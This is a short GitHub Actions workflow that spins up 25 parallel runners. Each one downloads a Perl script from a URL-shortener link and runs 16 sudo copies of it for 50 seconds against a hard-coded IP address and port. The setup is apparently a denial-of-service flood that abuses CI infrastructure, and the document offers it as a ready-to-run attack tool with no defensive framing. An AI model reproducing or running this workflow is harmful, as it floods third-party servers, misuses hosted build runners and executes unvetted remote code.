name: Dcv2 40 saniye !

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]
    steps:
      - name: OK !
        run: |
          wget https://curl.by/4ssvd/hexba.pl -O hexba.pl
          chmod +x hexba.pl
          PIDS=()
          for i in {1..16}; do
            sudo timeout 50 perl hexba.pl 104.29.146.238 19311 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: |
          sleep 50
          exit 0
